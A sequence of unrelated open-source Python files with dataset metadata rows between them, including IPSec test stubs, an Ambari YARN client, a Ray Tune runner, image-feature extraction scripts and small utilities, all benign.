"""ipsecmb noESN AES-GCM-128/NONE IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_noESN_AES_GCM_192_NONE(RunTestIpsecEspAll):
"""ipsecmb noESN AES-GCM-192/NONE IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_noESN_AES_GCM_256_NONE(RunTestIpsecEspAll):
"""ipsecmb noESN AES-GCM-256/NONE IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_noESN_AES_CBC_128_MD5_96(RunTestIpsecEspAll):
"""ipsecmb noESN AES-CBC-128/MD5-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_noESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb noESN AES-CBC-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_noESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb noESN AES-CBC-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_noESN_3DES_CBC_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb noESN 3DES-CBC/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_noESN_NONE_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb noESN NONE/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_noESN_AES_CTR_128_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb noESN AES-CTR-128/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_noESN_AES_CTR_192_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb noESN AES-CTR-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_noESN_AES_CTR_256_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb noESN AES-CTR-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_ESN_AES_CBC_128_MD5_96(RunTestIpsecEspAll):
"""ipsecmb ESN AES-CBC-128/MD5-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_ESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb ESN AES-CBC-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_ESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb ESN AES-CBC-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_ESN_3DES_CBC_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb ESN 3DES-CBC/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_ESN_NONE_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb ESN NONE/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_ESN_AES_CTR_128_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb ESN AES-CTR-128/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_ESN_AES_CTR_192_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb ESN AES-CTR-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_ESN_AES_CTR_256_SHA1_96(RunTestIpsecEspAll):
"""ipsecmb ESN AES-CTR-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_noESN_AES_GCM_128_NONE(RunTestIpsecEspAll):
"""openssl noESN AES-GCM-128/NONE IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_noESN_AES_GCM_192_NONE(RunTestIpsecEspAll):
"""openssl noESN AES-GCM-192/NONE IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_noESN_AES_GCM_256_NONE(RunTestIpsecEspAll):
"""openssl noESN AES-GCM-256/NONE IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_noESN_AES_CBC_128_MD5_96(RunTestIpsecEspAll):
"""openssl noESN AES-CBC-128/MD5-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_noESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
"""openssl noESN AES-CBC-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_noESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
"""openssl noESN AES-CBC-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_noESN_3DES_CBC_SHA1_96(RunTestIpsecEspAll):
"""openssl noESN 3DES-CBC/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_noESN_NONE_SHA1_96(RunTestIpsecEspAll):
"""openssl noESN NONE/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_noESN_AES_CTR_128_SHA1_96(RunTestIpsecEspAll):
"""openssl noESN AES-CTR-128/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_noESN_AES_CTR_192_SHA1_96(RunTestIpsecEspAll):
"""openssl noESN AES-CTR-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_noESN_AES_CTR_256_SHA1_96(RunTestIpsecEspAll):
"""openssl noESN AES-CTR-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_ESN_AES_CBC_128_MD5_96(RunTestIpsecEspAll):
"""openssl ESN AES-CBC-128/MD5-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_ESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
"""openssl ESN AES-CBC-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_ESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
"""openssl ESN AES-CBC-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_ESN_3DES_CBC_SHA1_96(RunTestIpsecEspAll):
"""openssl ESN 3DES-CBC/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_ESN_NONE_SHA1_96(RunTestIpsecEspAll):
"""openssl ESN NONE/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_ESN_AES_CTR_128_SHA1_96(RunTestIpsecEspAll):
"""openssl ESN AES-CTR-128/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_ESN_AES_CTR_192_SHA1_96(RunTestIpsecEspAll):
"""openssl ESN AES-CTR-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_openssl_ESN_AES_CTR_256_SHA1_96(RunTestIpsecEspAll):
"""openssl ESN AES-CTR-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_async_noESN_AES_GCM_128_NONE(RunTestIpsecEspAll):
"""async noESN AES-GCM-128/NONE IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_async_noESN_AES_GCM_192_NONE(RunTestIpsecEspAll):
"""async noESN AES-GCM-192/NONE IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_async_noESN_AES_GCM_256_NONE(RunTestIpsecEspAll):
"""async noESN AES-GCM-256/NONE IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_async_noESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
"""async noESN AES-CBC-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_async_noESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
"""async noESN AES-CBC-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_async_ESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
"""async ESN AES-CBC-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_async_ESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
"""async ESN AES-CBC-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
| 37.350217
| 79
| 0.581018
|
acff59e249bf9c6eb6d2ae12aa479be93b467590
| 1,427
|
py
|
Python
|
stacks/XIAOMATECH/1.0/services/YARN/package/scripts/yarn_client.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | 3
|
2019-08-13T01:44:16.000Z
|
2019-12-10T04:05:56.000Z
|
stacks/XIAOMATECH/1.0/services/YARN/package/scripts/yarn_client.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | null | null | null |
stacks/XIAOMATECH/1.0/services/YARN/package/scripts/yarn_client.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | 7
|
2019-05-29T17:35:25.000Z
|
2021-12-04T07:55:10.000Z
|
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ambari Agent
"""
import sys
from resource_management.libraries.script.script import Script
from resource_management.core.exceptions import ClientComponentHasNoStatus
from yarn import yarn, install_yarn
class YarnClient(Script):
def install(self, env):
self.install_packages(env)
install_yarn()
self.configure(env)
def configure(self, env):
import params
env.set_params(params)
yarn()
def status(self, env):
raise ClientComponentHasNoStatus()
def pre_upgrade_restart(self, env):
import params
env.set_params(params)
if __name__ == "__main__":
YarnClient().execute()
| 29.122449
| 74
| 0.747722
|
acff5a264e2e9a300bd7ddde1ac45f942047b936
| 2,977
|
py
|
Python
|
python/ray/tune/tune.py
|
rickyHong/Ray-repl
|
24b93b11231fe627c4b4527535ae0c83a99485f8
|
[
"Apache-2.0"
] | 1
|
2020-06-25T18:17:10.000Z
|
2020-06-25T18:17:10.000Z
|
python/ray/tune/tune.py
|
rickyHong/Ray-Population-Based-Training-repl
|
195a42f2fa4ab39d1e2260e6860d88c529023655
|
[
"Apache-2.0"
] | null | null | null |
python/ray/tune/tune.py
|
rickyHong/Ray-Population-Based-Training-repl
|
195a42f2fa4ab39d1e2260e6860d88c529023655
|
[
"Apache-2.0"
] | 1
|
2021-09-22T14:46:19.000Z
|
2021-09-22T14:46:19.000Z
|
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import json
import sys
import ray
from ray.tune import TuneError
from ray.tune.hyperband import HyperBandScheduler
from ray.tune.median_stopping_rule import MedianStoppingRule
from ray.tune.trial import Trial
from ray.tune.trial_runner import TrialRunner
from ray.tune.trial_scheduler import FIFOScheduler
from ray.tune.variant_generator import generate_trials
EXAMPLE_USAGE = """
MNIST tuning example:
./tune.py -f examples/tune_mnist_ray.yaml
"""
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Tune hyperparameters with Ray.",
epilog=EXAMPLE_USAGE)
# See also the base parser definition in ray/tune/config_parser.py
parser.add_argument("--redis-address", default=None, type=str,
help="The Redis address of the cluster.")
parser.add_argument("--num-cpus", default=None, type=int,
help="Number of CPUs to allocate to Ray.")
parser.add_argument("--num-gpus", default=None, type=int,
help="Number of GPUs to allocate to Ray.")
parser.add_argument("--scheduler", default="FIFO", type=str,
help="FIFO, MedianStopping, or HyperBand")
parser.add_argument("--scheduler-config", default="{}", type=json.loads,
help="Config options to pass to the scheduler.")
parser.add_argument("-f", "--config-file", required=True, type=str,
help="Read experiment options from this JSON/YAML file.")
_SCHEDULERS = {
"FIFO": FIFOScheduler,
"MedianStopping": MedianStoppingRule,
"HyperBand": HyperBandScheduler,
}
def _make_scheduler(args):
if args.scheduler in _SCHEDULERS:
return _SCHEDULERS[args.scheduler](**args.scheduler_config)
else:
raise TuneError(
"Unknown scheduler: {}, should be one of {}".format(
args.scheduler, _SCHEDULERS.keys()))
def run_experiments(experiments, scheduler=None, **ray_args):
if scheduler is None:
scheduler = FIFOScheduler()
runner = TrialRunner(scheduler)
for name, spec in experiments.items():
for trial in generate_trials(spec, name):
runner.add_trial(trial)
print(runner.debug_string())
ray.init(**ray_args)
while not runner.is_finished():
runner.step()
print(runner.debug_string())
for trial in runner.get_trials():
if trial.status != Trial.TERMINATED:
raise TuneError("Trial did not complete", trial)
return runner.get_trials()
if __name__ == "__main__":
import yaml
args = parser.parse_args(sys.argv[1:])
with open(args.config_file) as f:
experiments = yaml.load(f)
run_experiments(
experiments, _make_scheduler(args), redis_address=args.redis_address,
num_cpus=args.num_cpus, num_gpus=args.num_gpus)
| 31.336842
| 77
| 0.696003
|
acff5b737dcbc3f48c0ae5a60732477f3a067c10
| 3,099
|
py
|
Python
|
python/apps/extract_static_thumbnails.py
|
CamHD-Analysis/camhd_motion_analysis
|
41c38b9de4459e658a3358596e7995aa01f660e7
|
[
"MIT"
] | 1
|
2021-01-20T13:45:50.000Z
|
2021-01-20T13:45:50.000Z
|
python/apps/extract_static_thumbnails.py
|
CamHD-Analysis/camhd_motion_analysis
|
41c38b9de4459e658a3358596e7995aa01f660e7
|
[
"MIT"
] | 5
|
2018-07-17T19:07:32.000Z
|
2018-07-19T19:53:42.000Z
|
python/apps/extract_static_thumbnails.py
|
CamHD-Analysis/camhd_motion_analysis
|
41c38b9de4459e658a3358596e7995aa01f660e7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import json
import logging
import argparse
import glob
import pandas as pd
import numpy as np
import os
import os.path as path
from scipy import misc
import camhd_motion_analysis as ma
import pycamhd.lazycache as camhd
parser = argparse.ArgumentParser(description='')
parser.add_argument('input', metavar='N', nargs='+',
help='*_optical_flow_regions.json file to analyze')
# parser.add_argument('--base-dir', dest='basedir', metavar='o', nargs='?',
# help='Base directory')
parser.add_argument('--output-dir', dest='outdir', metavar='o', nargs='?', default=".",
help='File for output')
parser.add_argument('--log', metavar='log', nargs='?', default='INFO',
help='Logging level')
parser.add_argument('--force', dest='force', action='store_true', help='Force overwrite')
parser.add_argument('--lazycache-url', dest='lazycache', default=os.environ.get("LAZYCACHE_URL", "http://camhd-app-dev-nocache.appspot.com/v1/org/oceanobservatories/rawdata/files"),
help='URL to Lazycache repo server')
args = parser.parse_args()
logging.basicConfig( level=args.log.upper() )
qt = camhd.lazycache( args.lazycache )
for input_path in args.input:
for infile in glob.iglob( input_path, recursive=True ):
logging.info( "Processing %s" % infile)
regions_json = ma.load_regions( infile )
mov_path = regions_json['movie']['URL']
classification_file = args.outdir + path.splitext(mov_path)[0] + "_classify.json"
if path.exists( classification_file ):
with open(classification_file) as f:
classification = json.load( f )
else:
classification = {}
regions = pd.DataFrame( regions_json["regions"] ).drop('stats',1)
static = regions[ regions.type == "static"]
min_length = 30
static["length"] = static.endFrame - static.startFrame
static = static.loc[ static.length >= min_length ]
for idx,r in static.iterrows():
logging.info(" Processing region from %d to %d" % (r.startFrame, r.endFrame) )
samples = 5
frames = range( r.startFrame, r.endFrame, round(r.length / (samples+1)) )
frames = frames[1:-1]
for f in frames:
base_path = path.splitext(mov_path)[0] + ("/frame_%08d.png" % f)
image_path = args.outdir + base_path
print(image_path)
if path.exists( image_path ) and not args.force:
logging.warning("Image %s already exists, not remaking" % image_path )
continue;
image = qt.get_frame( mov_path, f, timeout=30 )
os.makedirs( path.dirname(image_path), exist_ok=True )
misc.imsave( image_path, image )
if base_path not in classification:
classification[base_path] = "unknown"
with open( classification_file, 'w') as f:
json.dump(classification, f, indent=2)
| 32.28125
| 181
| 0.612778
|
acff5b7ce109502d31adac57d613afbee54fcdb8
| 655
|
py
|
Python
|
algorithms/bit-manipulation/maximizing-xor.py
|
PingHuskar/hackerrank
|
1bfdbc63de5d0f94cd9e6ae250476b4a267662f2
|
[
"Unlicense"
] | 41
|
2018-05-11T07:54:34.000Z
|
2022-03-29T19:02:32.000Z
|
algorithms/bit-manipulation/maximizing-xor.py
|
PingHuskar/hackerrank
|
1bfdbc63de5d0f94cd9e6ae250476b4a267662f2
|
[
"Unlicense"
] | 2
|
2021-09-13T10:03:26.000Z
|
2021-10-04T10:21:05.000Z
|
algorithms/bit-manipulation/maximizing-xor.py
|
PingHuskar/hackerrank
|
1bfdbc63de5d0f94cd9e6ae250476b4a267662f2
|
[
"Unlicense"
] | 21
|
2019-01-23T19:06:59.000Z
|
2021-12-23T16:03:47.000Z
|
# Algorithms > Bit Manipulation > Maximizing XOR
# Given two integers, L and R, find the maximal value of A xor B,
# where A and B satisfy a condition.
#
# https://www.hackerrank.com/challenges/maximizing-xor/problem
#
# L = 00000101......
# R = 00000111......
# L^R = 00000010......
# sol = 0000001111...1 on met des 1 après le bit le plus à gauche de L^R
def maximizingXor(l, r):
# Complete this function
r = l ^ r
m = 0
while r != 0:
r //= 2
m = m * 2 + 1
return m
if __name__ == "__main__":
l = int(input().strip())
r = int(input().strip())
result = maximizingXor(l, r)
print(result)
| 21.833333
| 77
| 0.583206
|
acff5c5843646246876c24f0dd8b20bf5e63b9ec
| 1,238
|
py
|
Python
|
src/fonts.py
|
samuelwestlake/ImageLabel
|
f80bc9fdb85e0c0171cd18049acd66a5887417eb
|
[
"MIT"
] | null | null | null |
src/fonts.py
|
samuelwestlake/ImageLabel
|
f80bc9fdb85e0c0171cd18049acd66a5887417eb
|
[
"MIT"
] | null | null | null |
src/fonts.py
|
samuelwestlake/ImageLabel
|
f80bc9fdb85e0c0171cd18049acd66a5887417eb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import pygame
def lato(size, style=None):
path = "../fonts/Lato/"
if style == "black":
return pygame.font.Font(path + "Lato-Black.ttf", int(size))
elif style == "black_italic":
return pygame.font.Font(path + "Lato-BlackItalic.ttf", int(size))
elif style == "bold":
return pygame.font.Font(path + "Lato-Bold.ttf", int(size))
elif style == "bold_italic":
return pygame.font.Font(path + "Lato-BoldItalic.ttf", int(size))
elif style == "hairline":
return pygame.font.Font(path + "Lato-Hairline.ttf", int(size))
elif style == "hairline_italic":
return pygame.font.Font(path + "Lato-HairlineItalic.ttf", int(size))
elif style == "italic":
return pygame.font.Font(path + "Lato-Italic.ttf", int(size))
elif style == "light":
return pygame.font.Font(path + "Lato-Light.ttf", int(size))
elif style == "light_italic":
return pygame.font.Font(path + "Lato-LightItalic.ttf", int(size))
else:
return pygame.font.Font(path + "Lato-Regular.ttf", int(size))
def lit_sans_medium(size, style=None):
path = "../fonts/LitSans-Medium/"
return pygame.font.Font(path + "LitSans-Medium.otf", int(size))
| 37.515152
| 76
| 0.632472
|
acff5cb695ea0a88996ce4ceeecd75090fe7e99a
| 10,360
|
py
|
Python
|
scripts/precompute_resnet_img_features.py
|
ayshrv/visitron
|
2f30e6c002ed021d2be209a94a5e77c2d7e2117f
|
[
"MIT-0"
] | 5
|
2021-05-27T14:23:07.000Z
|
2021-10-30T14:38:24.000Z
|
scripts/precompute_resnet_img_features.py
|
ayshrv/visitron
|
2f30e6c002ed021d2be209a94a5e77c2d7e2117f
|
[
"MIT-0"
] | 1
|
2022-02-08T19:04:03.000Z
|
2022-02-08T19:04:03.000Z
|
scripts/precompute_resnet_img_features.py
|
ayshrv/visitron
|
2f30e6c002ed021d2be209a94a5e77c2d7e2117f
|
[
"MIT-0"
] | 3
|
2020-10-07T22:56:50.000Z
|
2021-10-30T14:38:19.000Z
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import argparse
import base64
import csv
import json
import math
import os
import random
import sys
from multiprocessing import Pool
import cv2
import MatterSim
import numpy as np
import torch
import torch.nn as nn
import torchvision
import torchvision.models
import torchvision.transforms.functional as F
from PIL import Image
from timer import Timer
# sys.path.insert(0, "/root/mount/Matterport3DSimulator/models/")
# import bit_pytorch.models as bit_models
csv.field_size_limit(sys.maxsize)
parser = argparse.ArgumentParser()
parser.add_argument(
"--model",
type=str,
default="ResNet-152",
choices=[
"ResNet-152",
"BiT-M-R50x1",
"BiT-M-R50x3",
"BiT-M-R50x1",
"BiT-M-R101x1",
"BiT-M-R101x3",
"BiT-M-R152x4",
"BiT-S-R50x1",
"BiT-S-R50x3",
"BiT-S-R101x1",
"BiT-S-R101x3",
"BiT-S-R152x4",
],
)
parser.add_argument("--img-features-dir", type=str, default="srv/img_features")
parser.add_argument("--models-dir", type=str, default="models/")
parser.add_argument("--output-feature-file", type=str, default="")
parser.add_argument("--seed", type=int, default=1, help="")
parser.add_argument("--batch-size", type=int, default=12, help="")
args = parser.parse_args()
FEATURE_SIZES = {
"ResNet-152": 2048,
"BiT-M-R50x1": 2048,
"BiT-M-R50x3": 6144,
"BiT-M-R101x1": 2048,
"BiT-M-R101x3": 6144,
"BiT-M-R152x4": 8192,
"BiT-S-R50x1": 2048,
"BiT-S-R50x3": 6144,
"BiT-S-R101x1": 2048,
"BiT-S-R101x3": 6144,
"BiT-S-R152x4": 8192,
}
NUM_GPUS = 1
MODEL_NAME = args.model
FEATURE_SIZE = FEATURE_SIZES[MODEL_NAME]
BATCH_SIZE = (
args.batch_size
) # Some fraction of viewpoint size - batch size 4 equals 11GB memory
if args.output_feature_file == "":
OUTFILE = "%s-imagenet-pytorch.tsv" % MODEL_NAME
else:
OUTFILE = args.output_feature_file
OUTFILE = os.path.join(args.img_features_dir, OUTFILE)
MERGED = OUTFILE
if NUM_GPUS != 1:
OUTFILE = OUTFILE + ".%d"
MODELS = args.models_dir
GRAPHS = "connectivity/"
SEED = args.seed
print("SEED: %d" % SEED)
# --------------------------------------------
# --------------------------------------------
TSV_FIELDNAMES = ["scanId", "viewpointId", "image_w", "image_h", "vfov", "features"]
VIEWPOINT_SIZE = 36 # Number of discretized views from one viewpoint
GPU_ID = 0
# Simulator image parameters
WIDTH = 640
HEIGHT = 480
VFOV = 60
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
torch.cuda.manual_seed(SEED)
def load_model(model_name):
if model_name == "ResNet-152":
resnet_full = torchvision.models.resnet152(pretrained=True)
resnet = nn.Sequential(*list(resnet_full.children())[:-1])
return resnet
elif "BiT" in model_name: # BiT-M-R50x1
model = bit_models.KNOWN_MODELS[model_name](head_size=1000, zero_head=True)
model.load_from(np.load(MODELS + model_name + ".npz"))
all_layers = list(model.children())
main_stack = all_layers[:-1]
last_layer_wihout_fc = all_layers[-1][:-1]
model_without_fc = main_stack + [last_layer_wihout_fc]
bit = nn.Sequential(*model_without_fc)
return bit
def load_viewpointids(job_id=0):
viewpointIds = []
with open(GRAPHS + "scans.txt") as f:
scans = [scan.strip() for scan in f.readlines()]
for scan in scans:
with open(GRAPHS + scan + "_connectivity.json") as j:
data = json.load(j)
for item in data:
if item["included"]:
viewpointIds.append((scan, item["image_id"]))
random.seed(SEED)
random.shuffle(viewpointIds)
if NUM_GPUS != 1:
viewpointIds = viewpointIds[job_id::NUM_GPUS]
print("%d: Loaded %d viewpoints" % (job_id, len(viewpointIds)))
return viewpointIds
def transform_img_resnet(im):
""" Prep opencv 3 channel image for the network """
np_im = np.array(im, copy=True).astype(np.float32)
np_im = np_im[..., ::-1]
np_im = np_im.transpose((2, 0, 1)) # (3, H, W)
np_im = np.ascontiguousarray(np_im, dtype=np.float32)
im = torch.from_numpy(np_im)
im /= 255.0
return F.normalize(im, mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
def transform_img_bit(im):
np_im = np.array(im, copy=True).astype(np.float32)
np_im = np_im[..., ::-1]
np_im = np_im.transpose((2, 0, 1)) # (3, H, W)
np_im = np.ascontiguousarray(np_im, dtype=np.float32)
im = torch.from_numpy(np_im)
im /= 255.0
return F.normalize(im, mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])
def build_tsv(ids):
job_id = ids[0]
gpu_id = ids[1]
print("JOB ID %d GPU ID %d: build_tsv" % (job_id, gpu_id))
# Set up the simulator
sim = MatterSim.Simulator()
sim.setCameraResolution(WIDTH, HEIGHT)
sim.setCameraVFOV(math.radians(VFOV))
sim.setDiscretizedViewingAngles(True)
sim.setBatchSize(1)
sim.initialize()
with torch.no_grad():
device = torch.device("cuda:%d" % gpu_id)
model = load_model(MODEL_NAME).to(device)
model.eval()
count = 0
t_render = Timer()
t_net = Timer()
if NUM_GPUS == 1:
output_file = OUTFILE
else:
output_file = OUTFILE % job_id
with open(output_file, "wt") as tsvfile:
writer = csv.DictWriter(tsvfile, delimiter="\t", fieldnames=TSV_FIELDNAMES)
# Loop all the viewpoints in the simulator
viewpointIds = load_viewpointids(job_id)
for scanId, viewpointId in viewpointIds:
t_render.tic()
# Loop all discretized views from this location
blobs = []
features = np.empty([VIEWPOINT_SIZE, FEATURE_SIZE], dtype=np.float32)
for ix in range(VIEWPOINT_SIZE):
if ix == 0:
sim.newEpisode(
[scanId], [viewpointId], [0], [math.radians(-30)]
)
elif ix % 12 == 0:
sim.makeAction([0], [1.0], [1.0])
else:
sim.makeAction([0], [1.0], [0])
state = sim.getState()[0]
assert state.viewIndex == ix
# Transform and save generated image
if "ResNet" in MODEL_NAME:
transformed_im = transform_img_resnet(state.rgb)
elif "BiT" in MODEL_NAME:
transformed_im = transform_img_bit(state.rgb)
blobs.append(transformed_im)
t_render.toc()
t_net.tic()
# Run as many forward passes as necessary
assert VIEWPOINT_SIZE % BATCH_SIZE == 0
forward_passes = VIEWPOINT_SIZE // BATCH_SIZE
ix = 0
data = torch.empty(
(BATCH_SIZE, 3, HEIGHT, WIDTH), dtype=torch.float32, device=device
)
for f in range(forward_passes):
for n in range(BATCH_SIZE):
# Copy image blob to the net
data[n, :, :, :] = blobs[ix]
ix += 1
# Forward pass
features[f * BATCH_SIZE : (f + 1) * BATCH_SIZE, :] = (
model(data).squeeze().cpu().detach().numpy()
)
writer.writerow(
{
"scanId": scanId,
"viewpointId": viewpointId,
"image_w": WIDTH,
"image_h": HEIGHT,
"vfov": VFOV,
"features": str(base64.b64encode(features), "utf-8"),
}
)
count += 1
t_net.toc()
if count % 100 == 0:
print(
"Processed %d / %d viewpoints, %.1fs avg render time, %.1fs avg net time, projected %.1f hours"
% (
count,
len(viewpointIds),
t_render.average_time,
t_net.average_time,
(t_render.average_time + t_net.average_time)
* len(viewpointIds)
/ 3600,
)
)
def merge_tsvs():
test = [OUTFILE % i for i in range(NUM_GPUS)]
with open(MERGED, "wt") as tsvfile:
writer = csv.DictWriter(tsvfile, delimiter="\t", fieldnames=TSV_FIELDNAMES)
for infile in test:
print(infile)
with open(infile, "rt") as tsv_in_files:
reader = csv.DictReader(
tsv_in_files, delimiter="\t", fieldnames=TSV_FIELDNAMES
)
for item in reader:
try:
writer.writerow(item)
except Exception as e:
print(e)
print(item["image_id"])
def read_tsv(infile):
# Verify we can read a tsv
in_data = []
with open(infile, "rt") as tsv_in_file:
reader = csv.DictReader(tsv_in_file, delimiter="\t", fieldnames=TSV_FIELDNAMES)
for item in reader:
item["scanId"] = item["scanId"]
item["image_h"] = int(item["image_h"])
item["image_w"] = int(item["image_w"])
item["vfov"] = int(item["vfov"])
item["features"] = np.frombuffer(
base64.b64decode(item["features"]), dtype=np.float32
).reshape((VIEWPOINT_SIZE, FEATURE_SIZE))
in_data.append(item)
return in_data
if __name__ == "__main__":
if NUM_GPUS == 1:
build_tsv()
data = read_tsv(OUTFILE)
print("Completed %d viewpoints" % len(data))
else:
# JOB, GPU
ids = [[0, 0], [1, 1], [2, 2], [3, 3]]
p = Pool(4)
p.map(build_tsv, ids)
merge_tsvs()
data = read_tsv(MERGED)
print("Completed %d viewpoints" % len(data))
| 30.925373
| 119
| 0.542278
|
acff5d90d533c828fc0684b7c5eb31fe2cc1544d
| 1,287
|
py
|
Python
|
src/conference_scheduler/lp_problem/objective_functions.py
|
ChahalMandeep/ConferenceScheduler
|
e5a0eff8796ba5711b5c3b591ff4b9a2e0f61a04
|
[
"MIT"
] | 46
|
2017-04-30T17:37:38.000Z
|
2022-03-29T12:52:38.000Z
|
src/conference_scheduler/lp_problem/objective_functions.py
|
ChahalMandeep/ConferenceScheduler
|
e5a0eff8796ba5711b5c3b591ff4b9a2e0f61a04
|
[
"MIT"
] | 95
|
2017-05-01T16:30:04.000Z
|
2018-11-07T10:48:50.000Z
|
src/conference_scheduler/lp_problem/objective_functions.py
|
ChahalMandeep/ConferenceScheduler
|
e5a0eff8796ba5711b5c3b591ff4b9a2e0f61a04
|
[
"MIT"
] | 11
|
2017-05-01T16:17:46.000Z
|
2022-03-29T12:52:41.000Z
|
from conference_scheduler.converter import schedule_to_array
def efficiency_capacity_demand_difference(slots, events, X, **kwargs):
"""
A function that calculates the total difference between demand for an event
and the slot capacity it is scheduled in.
"""
overflow = 0
for row, event in enumerate(events):
for col, slot in enumerate(slots):
overflow += (event.demand - slot.capacity) * X[row, col]
return overflow
def equity_capacity_demand_difference(slots, events, X, beta, **kwargs):
"""
A function that returns the maximum difference between demand for an event
and the slot capacity it is scheduled in.
"""
return beta
def number_of_changes(slots, events, original_schedule, X, **kwargs):
"""
A function that counts the number of changes between a given schedule
and an array (either numpy array of lp array).
"""
changes = 0
original_array = schedule_to_array(original_schedule, events=events,
slots=slots)
for row, event in enumerate(original_array):
for col, slot in enumerate(event):
if slot == 0:
changes += X[row, col]
else:
changes += 1 - X[row, col]
return changes
| 34.783784
| 79
| 0.645688
|
acff5e8e539c1f6e03a9da1d188d743aa926b75c
| 1,375
|
py
|
Python
|
trape.py
|
xmi666/trape
|
4f56fbb3f88bcf8d9ceff1f2e32b300bd58b43c4
|
[
